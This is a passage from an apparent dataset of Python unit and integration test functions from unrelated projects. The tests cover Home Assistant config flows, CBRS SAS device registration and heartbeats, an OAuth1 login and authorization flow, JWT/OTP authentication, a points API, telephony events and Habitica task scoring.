config_entries.SOURCE_USER}\n )\n assert result[\"type\"] == RESULT_TYPE_FORM\n assert result[\"errors\"] is None\n\n with patch(\"aussiebb.asyncio.AussieBB.__init__\", return_value=None), patch(\n \"aussiebb.asyncio.AussieBB.login\", return_value=True\n ), patch(\"aussiebb.asyncio.AussieBB.get_services\", return_value=FAKE_SERVICES):\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n FAKE_DATA,\n )\n await hass.async_block_till_done()\n\n assert result2[\"type\"] == RESULT_TYPE_FORM\n assert result2[\"step_id\"] == \"service\"\n assert result2[\"errors\"] is None\n\n with patch(\n \"homeassistant.components.aussie_broadband.async_setup_entry\",\n return_value=True,\n ) as mock_setup_entry:\n result3 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {CONF_SERVICES: [FAKE_SERVICES[1][\"service_id\"]]},\n )\n await hass.async_block_till_done()\n\n assert result3[\"type\"] == RESULT_TYPE_CREATE_ENTRY\n assert result3[\"title\"] == TEST_USERNAME\n assert result3[\"data\"] == FAKE_DATA\n assert result3[\"options\"] == {\n CONF_SERVICES: [FAKE_SERVICES[1][\"service_id\"]],\n }\n assert len(mock_setup_entry.mock_calls) == 1", "def test_10_9_4_1_1_1(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n 
open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)", "def test_timetracking_resource_methods(self, mock_url, resource_name, single_name):\n business_id = 1234\n resource_id = 2345\n resource_ = getattr(self.freshBooksClient, resource_name)\n\n list_response = {resource_name: [], \"meta\": {\"page\": 1, \"pages\": 0, \"per_page\": 15, \"total\": 0}}\n single_response = {single_name: {}}\n\n with patch.object(TimetrackingResource, \"_request\", return_value=list_response) as mock_request:\n resource_.list(business_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.GET)\n\n with patch.object(TimetrackingResource, \"_request\", return_value=single_response) as mock_request:\n resource_.get(business_id, resource_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.GET)\n\n resource_.create(business_id, {})\n mock_request.assert_called_with(\"some_url\", HttpVerbs.POST, data={single_name: {}})\n\n resource_.update(business_id, resource_id, {})\n mock_request.assert_called_with(\"some_url\", HttpVerbs.PUT, data={single_name: {}})\n\n resource_.delete(business_id, resource_id)\n mock_request.assert_called_with(\"some_url\", HttpVerbs.DELETE)", "def test_10_9_4_2_3_1_3(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n request = {'registrationRequest': [device_a]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertEqual(response['response']['responseCode'], 0)\n cbsd_id = response['cbsdId']\n del request, response\n\n # Request grant\n grant_0 = json.load(\n open(os.path.join('testcases', 'testdata', 'grant_0.json')))\n grant_0['cbsdId'] = cbsd_id\n request = {'grantRequest': [grant_0]}\n # Check grant response\n response = self._sas.Grant(request)['grantResponse'][0]\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertTrue(response['grantId'])\n self.assertEqual(response['response']['responseCode'], 0)\n grant_id = response['grantId']\n del request, response\n\n # First successful Heartbeat\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id,\n 'operationState': 'GRANTED'\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['cbsdId'], cbsd_id)\n self.assertEqual(response['grantId'], grant_id)\n self.assertLess(datetime.utcnow(),\n datetime.strptime(response['transmitExpireTime'],\n '%Y-%m-%dT%H:%M:%SZ'))\n self.assertEqual(response['response']['responseCode'], 0)\n del request, response\n\n # 
operationState is missing\n request = {\n 'heartbeatRequest': [{\n 'cbsdId': cbsd_id,\n 'grantId': grant_id\n }]\n }\n response = self._sas.Heartbeat(request)['heartbeatResponse'][0]\n # Check the heartbeat response\n self.assertEqual(response['response']['responseCode'], 102)", "def test_valid_flow__registration(self):\n\n test_env = {\n \"testapp_authority\": self.testapp_authority,\n \"testapp_app\": self.testapp_app,\n \"extra_environ_app\": {\n \"wsgi.url_scheme\": \"https\",\n \"HTTP_HOST\": \"app.example.com\",\n },\n \"extra_environ_authority\": {\n \"wsgi.url_scheme\": \"https\",\n \"HTTP_HOST\": \"authority.example.com\",\n },\n \"requests_session_app\": requests.Session(),\n \"requests_session_authority\": requests.Session(),\n }\n\n def callback__request_token(req, test_env=test_env):\n \"\"\"/authority/oauth1/request_token is visited by the Server\n\n py3 needs the 'unicode' wrapper to decode the bystring\n \"\"\"\n assert \"Authorization\" in req.headers\n assert req.headers[\"Authorization\"].decode(\"utf-8\").startswith(\"OAuth \")\n assert \"User-Agent\" in req.headers\n assert req.headers[\"User-Agent\"].decode(\"utf-8\") == \"CustomApiClient v0\"\n assert req.url == oauth1_utils.CustomApiClient.OAUTH1_SERVER_REQUEST_TOKEN\n\n # request as SERVER, no cookies\n with IsolatedTestapp(test_env[\"testapp_authority\"]) as testapp:\n res = testapp.get(\n \"/authority/oauth1/request_token\",\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__authenticate_get(req, test_env=test_env):\n \"\"\"/authority/oauth1/authorize is visited by the USER\"\"\"\n assert req.url.startswith(OAUTH1__URL_AUTHORITY_AUTHENTICATE)\n qs = req.url.split(\"?\")[1]\n qs = dict(parse_qsl(qs))\n\n testapp = test_env[\"testapp_authority\"]\n res = testapp.get(\n \"/authority/oauth1/authorize?oauth_token=%s\" % qs[\"oauth_token\"],\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__authenticate_post(req, test_env=test_env):\n \"\"\"/authority/oauth1/authorize is visited by the USER\"\"\"\n assert req.url.startswith(OAUTH1__URL_AUTHORITY_AUTHENTICATE)\n payload = dict(parse_qsl(req.body))\n\n testapp = test_env[\"testapp_authority\"]\n res = testapp.post(\n \"/authority/oauth1/authorize\",\n payload,\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=302,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__callback(req, test_env=test_env):\n \"\"\"/application/flow-register/authorized-callback is visited by the USER\"\"\"\n _path, _qs = req.url.split(\"?\")\n\n testapp = test_env[\"testapp_app\"]\n res = testapp.get(\n \"/application/flow-register/authorized-callback?%s\" % _qs,\n headers=req.headers,\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n 
test_env[\"requests_session_app\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '303 See Other'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__access_token(req, test_env=test_env):\n \"\"\"/authority/oauth1/access_token is visited by the Server\"\"\"\n assert \"Authorization\" in req.headers\n assert req.headers[\"Authorization\"].decode(\"utf-8\").startswith(\"OAuth \")\n assert \"User-Agent\" in req.headers\n assert req.headers[\"User-Agent\"].decode(\"utf-8\") == \"CustomApiClient v0\"\n assert req.url == oauth1_utils.CustomApiClient.OAUTH1_SERVER_ACCESS_TOKEN\n\n # request as SERVER, no cookies\n with IsolatedTestapp(test_env[\"testapp_authority\"]) as testapp:\n _headers = string_headers(\n req.headers\n ) # these can end up being unicode in tests\n res = testapp.get(\n \"/authority/oauth1/access_token\",\n headers=_headers,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n def callback__callback_success(req, test_env=test_env):\n \"\"\"/application/flow-register/authorized-callback-success is visited by the USER\"\"\"\n (_path, _qs) = parse_request_simple(req)\n\n testapp = test_env[\"testapp_application\"]\n _headers = string_headers(\n req.headers\n ) # these can end up being unicode in tests\n res = testapp.get(\n \"/application/flow-register/authorized-callback-success?%s\" % _qs,\n headers=_headers,\n extra_environ=test_env[\"extra_environ_app\"],\n status=200,\n )\n test_env[\"requests_session_application\"].cookies.update(\n testapp.cookies\n ) # update the session with the cookies from the response\n\n # status is '200 OK'\n # return in a format tailored for `requests`\n return (int(res.status.split(\" \")[0]), res.headers, res.body)\n\n with responses.RequestsMock() as rsps:\n rsps.add_callback(\n responses.GET,\n oauth1_utils.CustomApiClient.OAUTH1_SERVER_REQUEST_TOKEN, # /authority/oauth1/request_token\n callback=callback__request_token,\n )\n rsps.add_callback(\n responses.GET,\n oauth1_utils.CustomApiClient.OAUTH1_SERVER_ACCESS_TOKEN, # /authority/oauth1/access_token\n callback=callback__access_token,\n )\n\n # the following were originally handled via `requests.get` but migrated to direct webtest queries\n #\n # rsps.add_callback(\n # responses.GET, OAUTH1__URL_AUTHORITY_AUTHENTICATE, # /authority/oauth1/authorize\n # callback=callback__authenticate_get,\n # )\n # rsps.add_callback(\n # responses.POST, OAUTH1__URL_AUTHORITY_AUTHENTICATE, # /authority/oauth1/authorize\n # callback=callback__authenticate_post,\n # )\n # rsps.add_callback(\n # responses.GET, oauth1_model.OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK, # https://example.com/application/flow-register/authorized-callback\n # callback=callback__callback,\n # )\n # rsps.add_callback(\n # responses.GET, oauth1_model.OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK_SUCCESS, # https://example.com/application/flow-register/authorized-callback-success\n # callback=callback__callback_success,\n # )\n\n #\n # actual test flow...\n #\n\n # first we need to log into the oAuth1 Authority\n # the authority is the account which will be the oAuth identity provider (e.g. 
Twitter)\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/login-form\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n assert res.text == \"authority|login-form\"\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/login-submit\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/home; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/home\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"authority|home|user=%s\" % oauth1_model.USERID_ACTIVE__AUTHORITY\n )\n\n #\n # now we want to visit the application\n #\n\n # User visit's the application\n #\n res = self.testapp_app.get(\n \"/application/flow-register\",\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n test_env[\"requests_session_app\"].cookies.update(\n self.testapp_app.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /application/flow-register/oauth1/start; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n # User visit\n # however, it makes a behind the scenes visit to\n # * /authority/oauth1/request_token\n res = self.testapp_app.get(\n \"/application/flow-register/oauth1/start\",\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n test_env[\"requests_session_app\"].cookies.update(\n self.testapp_app.cookies\n ) # update the session with the cookies from the response\n assert \"Location\" in res.headers\n url_auth = res.headers[\"Location\"]\n assert res.headers[\"Location\"].startswith(\n OAUTH1__URL_AUTHORITY_AUTHENTICATE\n )\n\n # resAuthInbound = test_env['requests_session_authority'].get(url_auth)\n # then the user is redirected to the authority to approve\n qs = url_auth.split(\"?\")[1]\n url_auth_local = \"/authority/oauth1/authorize?%s\" % qs\n resAuthInbound = self.testapp_authority.get(\n url_auth_local, extra_environ=test_env[\"extra_environ_authority\"]\n )\n assert (\n '<form action=\"/authority/oauth1/authorize\" method=\"POST\" id=\"app-action-authorize\">'\n in resAuthInbound.text\n )\n csrfs = re_csrf.findall(resAuthInbound.text)\n assert len(csrfs) == 2 # submit, deny\n tokens = re_token.findall(resAuthInbound.text)\n assert len(tokens) == 2 # submit, deny\n\n payload = {\n \"csrf_\": csrfs[0],\n \"oauth_token\": tokens[0],\n \"submit\": \"authorize\",\n }\n # payload = {'csrf_': csrfs[0], 'oauth_token': tokens[0], 'submit': 'authorize', }\n\n # visited by USER: Authorize the application on the Authority\n resAuthApprove = self.testapp_authority.post(\n \"/authority/oauth1/authorize\",\n payload,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=302,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with 
the cookies from the response\n\n # visited by USER: redirected to the callback page on the APPLICATION\n assert \"Location\" in resAuthApprove.headers\n url_callback = resAuthApprove.headers[\"Location\"]\n assert url_callback.startswith(OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK)\n qs = url_callback.split(\"?\")[1]\n url_callback_local = (\n \"/application/flow-register/authorized-callback?%s\" % qs\n )\n resAuthCallback = self.testapp_app.get(\n url_callback_local,\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n\n # visited by USER: redirected to the callback-success page on the APPLICATION\n assert \"Location\" in resAuthCallback.headers\n url_callback_success = resAuthCallback.headers[\"Location\"]\n assert url_callback_success.startswith(\n OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK_SUCCESS\n )\n assert len(url_callback_success.split(\"?\")) == 1\n url_callback_success_local = (\n \"/application/flow-register/authorized-callback-success\"\n )\n resAuthCallbackSuccess = self.testapp_app.get(\n url_callback_success_local,\n extra_environ=test_env[\"extra_environ_app\"],\n status=200,\n )\n assert (\n resAuthCallbackSuccess.text\n == \"application|register|authorized-callback-success|user=%s\"\n % oauth1_model.USERID_ACTIVE__APPLICATION\n )\n\n # ensure logout, just to be safe\n res = self.testapp_authority.get(\n \"/authority/account/logout\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/login-form; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n res = self.testapp_authority.get(\n \"/authority/account/home\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/login-form; you should be redirected automatically.\\n\\n\"\"\"\n )", "def test_case02(self):\n # Clear out collection\n url = \"http://localhost:3001/api/clear\"\n resp = requests.delete(url)\n\n url = \"http://localhost:3001/api/add-transaction\"\n\n data = {\"payer\": \"Kyle\", \"points\": 5000,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/spend-points\"\n data = {\"points\": 3000}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/get-balances\"\n resp = requests.get(url)\n\n expected_result = {\n \"Kyle\": 2000\n }\n self.assertEqual(resp.json(), expected_result)", "def test_case04(self):\n # Clear out collection\n url = \"http://localhost:3001/api/clear\"\n resp = requests.delete(url)\n\n url = \"http://localhost:3001/api/add-transaction\"\n\n data = {\"payer\": \"Kyle\", \"points\": 500,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n data = {\"payer\": \"John\", \"points\": 500,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/get-balances\"\n resp = requests.get(url)\n\n url = \"http://localhost:3001/api/spend-points\"\n data = {\"points\": 1500}\n resp = requests.post(url, json=data)\n\n expected_result = {\n \"err\": \"Not enough points\"\n }\n self.assertEqual(resp.json(), expected_result)", "def test_authflow(self):\n response = self.client.post('/auth/signup/', {\n 'first_name': 'John',\n 'last_name': 'Doe',\n 'email': '[email protected]',\n 'password': self.password,\n 'gstin': '11AAAAA1111A1A1',\n 'mobile': self.mobile,\n 
'business_name': 'busi_ness',\n 'address': {'address_name':'', 'address_line1': '', 'address_line2': '', 'state': '', 'pincode': '209801', 'country': 'INDIA'}\n })\n\n response_data = response.json()\n\n self.assertListEqual(list(response_data.keys()), ['id', 'otp'])\n\n response = self.client.post('/auth/verify-otp/', response_data)\n\n response_data = response.json()\n self.assertListEqual(list(response_data.keys()), ['token', 'refresh_token', 'session_key'])\n self.assertRegexpMatches(response_data['token'], r'[0-9A-Za-z\\-]+\\.[0-9A-Za-z\\-]+\\.[0-9A-Za-z\\-]+')\n self.assertRegexpMatches(response_data['refresh_token'], r'[0-9A-Za-z]{32}')\n self.assertRegexpMatches(response_data['session_key'], r'[0-9A-Za-z]{32}')\n\n response = self.client.post('/auth/signin/', {'id_field': self.mobile, 'password': self.password})\n auth_data = response.json()\n\n refresh_token = auth_data['refresh_token']\n session_key = auth_data['session_key']\n\n response = self.client.post('/auth/refresh/', {'refresh_token': refresh_token}, HTTP_AUTHORIZATION='JWT ' + auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n refreshed_auth_data = response.json() \n response = self.client.get('/auth/handle-sessions/', HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n active_sessions = response.json()\n self.assertListEqual(list(active_sessions.keys()), ['token_list'])\n\n acitve_sessions_token_list = active_sessions.get('token_list')\n\n # end all other sessions except your own\n for session_key_iter in acitve_sessions_token_list:\n if session_key_iter != session_key:\n self.client.post('/auth/handle-sessions/', {'session_key': session_key_iter}, HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n # log out from own session\n self.client.get('/auth/signout/', HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)", "def test_ab_success_twoclients(self):\n fixture_file = 'fixtures/simple/ab_success_twoclients.json'\n events = self.run_and_get_events(fixture_file)\n\n expected_events = [\n ('on_b_dial', {\n 'caller': 'SIP/260010001-00000015',\n 'targets': ['SIP/voipgrid-siproute-docker-00000016'],\n }),\n ('on_b_dial', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'targets': ['SIP/150010001-00000018'],\n }),\n ('on_up', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'target': 'SIP/150010001-00000018',\n }),\n ('on_up', {\n 'caller': 'SIP/260010001-00000015',\n 'target': 'SIP/voipgrid-siproute-docker-00000016',\n }),\n ('on_hangup', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'reason': 'completed',\n }),\n ('on_hangup', {\n 'caller': 'SIP/260010001-00000015',\n 'reason': 'completed',\n }),\n ]\n\n self.assertEqualChannels(expected_events, events)", "def test_WINNF_FT_S_REG_2(self):\n\n # Pre-load conditional parameters\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n self._sas_admin.InjectFccId({'fccId': device_b['fccId']})\n conditionals_b = {\n 'cbsdCategory': 'B', 'fccId': device_b['fccId'],\n 'cbsdSerialNumber': device_b['cbsdSerialNumber'],\n 'airInterface': device_b['airInterface'], \n 'installationParam': device_b['installationParam']}\n conditionals = {'registrationData': [conditionals_b]}\n self._sas_admin.PreloadRegistrationData(conditionals)\n # Register the device\n del device_b['cbsdCategory']\n del device_b['airInterface']\n del device_b['installationParam']\n request = {'registrationRequest': [device_b]}\n 
response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertTrue('cbsdId' in response)\n self.assertFalse('measReportConfig' in response)\n self.assertEqual(response['response']['responseCode'], 0)", "async def test_multiple_different_state(hass):\n calls_1 = async_mock_service(hass, DOMAIN, SERVICE_TURN_ON)\n calls_2 = async_mock_service(hass, DOMAIN, SERVICE_TURN_OFF)\n\n await async_reproduce_states(hass, [\n State(ENTITY_1, 'on'),\n State(ENTITY_2, 'off'),\n ])\n\n await hass.async_block_till_done()\n\n assert len(calls_1) == 1\n assert calls_1[0].data == {'entity_id': ENTITY_1}\n assert len(calls_2) == 1\n assert calls_2[0].data == {'entity_id': ENTITY_2}", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n 
instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "def test_basic_remove_one_of_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n self.write_config_file(config, args)\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n\n self.remove_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n self.assertFalse(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))", "def test_multihop_receiver_on_success(vo, did_factory, root_account, caches_mock, metrics_mock):\n receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'all_vos': True, 'total_threads': 1})\n receiver_thread.start()\n\n try:\n src_rse = 'XRD1'\n src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)\n jump_rse = 'XRD3'\n jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)\n dst_rse = 'XRD4'\n dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)\n\n all_rses = [src_rse_id, jump_rse_id, dst_rse_id]\n\n did = did_factory.upload_test_file(src_rse)\n rule_priority = 5\n rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=3600, locked=False, subscription_id=None, priority=rule_priority)\n submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=0, transfertype='single', filter_transfertool=None)\n\n request = __wait_for_state_transition(dst_rse_id=jump_rse_id, run_poller=False, **did)\n assert request['state'] == RequestState.DONE\n request = __wait_for_state_transition(dst_rse_id=dst_rse_id, run_poller=False, **did)\n assert request['state'] == RequestState.DONE\n\n fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query({request['external_id']: {request['id']: request}})\n assert fts_response[request['external_id']][request['id']].job_response['priority'] == rule_priority\n\n # Two hops; both handled by receiver\n assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 2\n finally:\n receiver_graceful_stop.set()\n receiver_thread.join(timeout=5)\n receiver_graceful_stop.clear()", "def test_get(self, app, data_queues, metricsmock, logs):\n 
res = self._call(app, ip=self.test_ip, method=\"get\", status=200)\n self.check_response(data_queues, res, \"ok\")\n self.check_queue(data_queues, 0)\n\n metricsmock.assert_incr_once(\n \"request\", tags=[self.metric_path, \"method:get\", \"status:200\"]\n )\n metricsmock.assert_timing_once(\n \"request.timing\", tags=[self.metric_path, \"method:get\"]\n )\n\n log = logs.only_entry\n expected_entry = {\n # accuracy is low for region API fixture, and medium for geolocate\n # see bound_model_accuracy and related tests for direct calculation\n \"accuracy\": logs.only_entry[\"accuracy\"],\n \"accuracy_min\": \"low\",\n \"api_key\": \"test\",\n \"api_path\": self.metric_path.split(\":\")[1],\n \"api_type\": self.metric_type,\n \"blue\": 0,\n \"blue_valid\": 0,\n \"cell\": 0,\n \"cell_valid\": 0,\n \"duration_s\": log[\"duration_s\"],\n \"event\": f\"GET {self.url} - 200\",\n \"fallback_allowed\": False,\n \"has_geoip\": True,\n \"has_ip\": True,\n \"http_method\": \"GET\",\n \"http_path\": self.url,\n \"http_status\": 200,\n \"log_level\": \"info\",\n \"region\": \"GB\",\n \"result_status\": \"hit\",\n \"source_geoip_accuracy\": log[\"accuracy\"],\n \"source_geoip_accuracy_min\": \"low\",\n \"source_geoip_status\": \"hit\",\n \"wifi\": 0,\n \"wifi_valid\": 0,\n }\n if self.metric_type == \"locate\":\n expected_entry[\"api_key_count\"] = 1\n expected_entry[\"api_response_sig\"] = log[\"api_response_sig\"]\n assert log == expected_entry", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url" ]
